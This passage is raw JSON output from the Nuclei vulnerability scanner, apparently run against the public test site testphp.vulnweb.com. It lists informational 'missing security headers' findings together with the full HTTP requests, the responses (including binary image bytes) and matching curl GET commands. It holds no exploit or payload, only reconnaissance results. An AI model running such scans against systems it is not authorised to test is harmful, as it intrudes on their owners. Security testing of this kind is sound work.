fffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:18.275108531Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:18.818436934Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:18.818510673Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: 